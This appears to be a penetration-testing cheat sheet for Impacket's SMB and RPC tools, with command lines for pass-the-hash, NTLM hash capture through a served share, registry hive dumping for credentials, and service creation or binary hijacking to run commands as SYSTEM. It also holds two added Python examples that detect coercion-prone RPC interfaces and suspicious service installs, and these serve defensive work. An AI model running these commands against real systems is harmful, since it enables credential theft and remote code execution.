Impacket - SMB and RPC

Quick Reference

Tool            Purpose
smbclient.py    SMB mini-shell - browse shares, upload, download
smbserver.py    Serve a local directory as an SMB share
rpcdump.py      Enumerate RPC endpoints via epmapper
reg.py          Remote Windows registry manipulation
services.py     Remote Windows service management

smbclient.py

SMB client mini-shell for interacting with shares: browse, upload and download files.

Syntax:

smbclient.py [options] <domain>/<username>:<password>@<target>

Common Usage:

# Interactive shell (password)
smbclient.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
smbclient.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> smbclient.py -k -no-pass <domain>/<username>@<target>

# AES key
smbclient.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Specify target IP (when hostname can't resolve)
smbclient.py -target-ip <target> <domain>/<username>:<password>@<target>

# Run commands from input file non-interactively
smbclient.py -inputfile commands.txt <domain>/<username>:<password>@<target>

# Log all actions to file
smbclient.py -outputfile <output> <domain>/<username>:<password>@<target>

Shell Commands (once connected):

shares                  - list available shares
use <share>             - connect to share
ls [path]               - list directory
cd <path>               - change directory
get <file>              - download file
put <file>              - upload file
mkdir <dir>             - create directory
rm <file>               - delete file
cat <file>              - print file contents
info                    - server info
logoff                  - log off the current session
exit / quit             - exit

Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -k / -no-pass - Kerberos via ccache
- -aesKey <aes256-key> - AES Kerberos key
- -dc-ip <dc-ip> - DC IP
- -target-ip <target> - Target IP override
- -port <port> - Destination SMB port
- -inputfile <file> - Commands file for non-interactive use
- -outputfile <file> - Log output to file


smbserver.py

Serve a local directory as an SMB share. Useful for file transfers, or for capturing the NTLM authentication of clients that connect to it.

Syntax:

smbserver.py [options] <shareName> <sharePath>

Common Usage:

# Serve /tmp as share named TMP (unauthenticated)
smbserver.py TMP /tmp

# Serve with SMB2 support
smbserver.py -smb2support TMP /tmp

# Serve with authentication required
smbserver.py -smb2support -username <username> -password <password> <share> /local/path

# Capture NTLM hashes (no auth required, just serve and capture)
smbserver.py -smb2support SHARE /tmp

# Listen on specific interface
smbserver.py -ip <target> -smb2support TMP /tmp

# Listen on non-default port
smbserver.py -port 4445 -smb2support TMP /tmp

# Output logs to file
smbserver.py -outputfile /tmp/smb.log TMP /tmp

# Drop SSP (NTLMv1 responses from clients whose policy still allows them, instead of NTLMv2)
smbserver.py -dropssp TMP /tmp

# IPv6
smbserver.py -6 -smb2support TMP /tmp

Options:
- <shareName> - Name of the share (positional, required)
- <sharePath> - Local path to serve (positional, required)
- -comment <text> - Share comment
- -username <username> - Require this username for auth
- -password <password> - Password for auth
- -hashes <lm-hash>:<nt-hash> - NTLM hashes for auth
- -ip <ip> / --interface-address <ip> - Bind address
- -port <port> - Listen port (default 445)
- -smb2support - Enable SMB2
- -dropssp - Disable NTLM ESS/SSP so clients that still permit NTLMv1 answer with it (clients at LmCompatibilityLevel 3 or higher keep sending NTLMv2)
- -6 / --ipv6 - Listen on IPv6
- -outputfile <file> - Log to file

Trigger NTLM auth from Windows target:

# UNC path access from target triggers NTLM capture
dir \\<attacker-ip>\SHARE
net use \\<attacker-ip>\SHARE


rpcdump.py

Enumerate RPC endpoints on a target via the endpoint mapper: lists all registered interfaces and their transport bindings.

Syntax:

rpcdump.py [options] <domain>/<username>:<password>@<target>

Common Usage:

# Dump all RPC endpoints (password)
rpcdump.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
rpcdump.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Unauthenticated (null session)
rpcdump.py <target>

# Specify target IP
rpcdump.py -target-ip <target> <domain>/<username>:<password>@<target>

# Custom port
rpcdump.py -port 135 <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -target-ip <target> - Target IP override
- -port <port> - Destination port for RPC endpoint mapper

Notes:
- Useful for identifying exposed RPC services (TSCH, ICPR, LSA, etc.)
- Look for MS-RPRN (print spooler - SpoolSS coerce), MS-EFSR (PetitPotam), MS-FSRVP
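To turn the note above into a repeatable hardening check, the following added example (not part of the original page or of Impacket) parses rpcdump.py text output and reports which coercion-prone interfaces a host exposes, with the fix a defender would apply. The sample output is constructed in the shape rpcdump.py prints; the UUIDs are the published protocol identifiers, and the hardening notes are assumptions of this example.

```python
import re

# Coercion-prone interfaces rpcdump.py may list, keyed by well-known UUID, with the
# hardening a defender applies (the notes are part of this added example, not rpcdump output).
COERCION_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": ("MS-RPRN", "disable Print Spooler where not needed"),
    "c681d488-d850-11d0-8c52-00c04fd90f7e": ("MS-EFSR", "RPC-filter EFSRPC or remove the EFS role"),
    "a8e0653c-2744-4389-a61d-7373df8b2292": ("MS-FSRVP", "stop the File Server VSS Agent service"),
}
UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

def parse_rpcdump(text):
    """Group rpcdump.py text output into one dict per interface: protocol, uuid, bindings."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Protocol:"):        # every entry begins with a Protocol line
            current = {"protocol": line.split(":", 1)[1].strip(), "uuid": None, "bindings": []}
            entries.append(current)
        elif line.startswith("UUID") and current is not None:
            m = UUID_RE.search(line)
            current["uuid"] = m.group(0).lower() if m else None
        elif line.startswith("ncacn_") and current is not None:   # indented binding lines
            current["bindings"].append(line)
    return entries

def coercion_exposure(entries):
    """Return (interface, hardening, bindings) for each coercion-prone interface present."""
    hits = []
    for e in entries:
        if e["uuid"] in COERCION_INTERFACES:
            name, fix = COERCION_INTERFACES[e["uuid"]]
            hits.append((name, fix, e["bindings"]))
    return hits

# Constructed sample in the shape of rpcdump.py output (not a real capture).
SAMPLE = """\
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49668]
          ncacn_np:\\\\FS01[\\pipe\\spoolss]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49669]
"""
```

Feed it real output with `coercion_exposure(parse_rpcdump(open("rpcdump.txt").read()))`; an empty result means none of the listed interfaces is registered on that host.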


reg.py

Remote Windows registry manipulation: query, add, delete, save, and backup registry keys.

Syntax:

reg.py [options] <domain>/<username>:<password>@<target> {query|add|delete|save|backup} ...

Common Usage:

# Query a registry key
reg.py <domain>/<username>:<password>@<target> query \
  -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"

# Query specific value
reg.py <domain>/<username>:<password>@<target> query \
  -keyName "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" \
  -v RequireSecuritySignature

# Add a registry value
reg.py <domain>/<username>:<password>@<target> add \
  -keyName "HKLM\SOFTWARE\TestKey" -v TestValue -vt REG_SZ -vd "hello"

# Delete a value
reg.py <domain>/<username>:<password>@<target> delete \
  -keyName "HKLM\SOFTWARE\TestKey" -v TestValue

# Save hive to a path on the target (the write happens on the remote host, so a UNC path to a share you serve is common)
reg.py <domain>/<username>:<password>@<target> save \
  -keyName "HKLM\SAM" -o SAM.save

# Backup SAM + SYSTEM + SECURITY (credential dumping prep)
reg.py <domain>/<username>:<password>@<target> backup -o /tmp/backup

# Pass-the-Hash
reg.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target> query \
  -keyName "HKLM\SAM"

# Kerberos (ccache)
KRB5CCNAME=<ticket> reg.py -k -no-pass <domain>/<username>@<target> query \
  -keyName "HKLM\SOFTWARE"

Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -k / -no-pass - Kerberos via ccache
- -aesKey <aes256-key> - AES Kerberos key
- -dc-ip <dc-ip> - DC IP
- -target-ip <target> - Target IP override
- -port <port> - Destination port

Actions:
- query - List subkeys and values under a key
- add - Add a subkey or value
- delete - Delete a subkey or value
- save - Save a hive to a file on the remote target
- backup - Special: save SAM, SYSTEM, and SECURITY hives


services.py

Remote Windows service management: list, create, start, stop, delete, configure services.

Syntax:

services.py [options] <domain>/<username>:<password>@<target> {list|create|start|stop|delete|status|config|change} ...

Common Usage:

# List all services
services.py <domain>/<username>:<password>@<target> list

# Get service status
services.py <domain>/<username>:<password>@<target> status -name <service-name>

# Get service config
services.py <domain>/<username>:<password>@<target> config -name <service-name>

# Start a service
services.py <domain>/<username>:<password>@<target> start -name <service-name>

# Stop a service
services.py <domain>/<username>:<password>@<target> stop -name <service-name>

# Create a service (persistence / command execution)
services.py <domain>/<username>:<password>@<target> create \
  -name <service-name> -display <service-name> \
  -path "C:\Windows\System32\cmd.exe /c <command>"

# Delete a service
services.py <domain>/<username>:<password>@<target> delete -name <service-name>

# Change service binary path (hijack)
services.py <domain>/<username>:<password>@<target> change \
  -name <service-name> -path "C:\Windows\Temp\evil.exe"

# Pass-the-Hash
services.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target> list

# Kerberos (ccache)
KRB5CCNAME=<ticket> services.py -k -no-pass <domain>/<username>@<target> list

Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -k / -no-pass - Kerberos via ccache
- -aesKey <aes256-key> - AES Kerberos key
- -dc-ip <dc-ip> - DC IP
- -target-ip <target> - Target IP override
- -port <port> - Destination port

Actions:
- list - List all services
- status - Get service status
- config - Get service configuration
- create - Create a new service
- start - Start a service
- stop - Stop a service
- delete - Delete a service
- change - Modify a service configuration

Notes:
- Creating a service with a malicious binary path and starting it runs the command as SYSTEM
- Always clean up (stop + delete) after use
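On the defending side, a service created or re-pointed this way leaves a System log event 7045 ("A service was installed in the system") whose ImagePath is a cmd.exe command line or a binary in a writable directory. The following added example (not part of the original page or of Impacket) triages such records; the events are constructed in the shape of 7045 EventData, and the path patterns are assumptions of this example.

```python
import re

# Constructed records in the shape of Windows System log event 7045 ("A service was
# installed in the system"); not real logs. Security event 4697 carries the same
# fields when service-install auditing is enabled.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Netlogon Helper", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\System32\cmd.exe /c whoami > C:\Windows\Temp\o.txt"},
    {"EventID": 7045, "ServiceName": "Updater", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\Temp\evil.exe"},
    {"EventID": 7045, "ServiceName": "Vendor Agent", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Program Files\Vendor\agent.exe"},
    {"EventID": 7036, "ServiceName": "Spooler", "State": "stopped"},
]

# An ImagePath that is really a command line through an interpreter (what
# services.py create -path "cmd.exe /c ..." produces) or a binary dropped in a
# user-writable or UNC location (what a hijacked -path often points to).
INTERPRETER = re.compile(r"\\(cmd|powershell|pwsh|rundll32|regsvr32|mshta)\.exe\b", re.I)
SUSPICIOUS_DIR = re.compile(r'^"?(?:C:\\Windows\\Temp\\|C:\\Users\\|C:\\ProgramData\\|\\\\)', re.I)

def classify_service_install(ev):
    """Return the reasons a 7045 record looks like remote service-based execution; [] if benign."""
    if ev.get("EventID") != 7045:
        return []
    path = ev.get("ImagePath", "")
    reasons = []
    if INTERPRETER.search(path):
        reasons.append("interpreter in ImagePath")
    if SUSPICIOUS_DIR.match(path):
        reasons.append("binary in user-writable or UNC location")
    if reasons and ev.get("AccountName") == "LocalSystem":
        reasons.append("runs as SYSTEM")
    return reasons

def triage(events):
    """Return (ServiceName, reasons) for every event that was flagged."""
    flagged = []
    for ev in events:
        reasons = classify_service_install(ev)
        if reasons:
            flagged.append((ev["ServiceName"], reasons))
    return flagged
```

Pair the 7045 hit with a 7036 "running" transition for the same ServiceName shortly afterwards and a 4624 network logon from the operator's host to reconstruct the full sequence the cheat sheet describes.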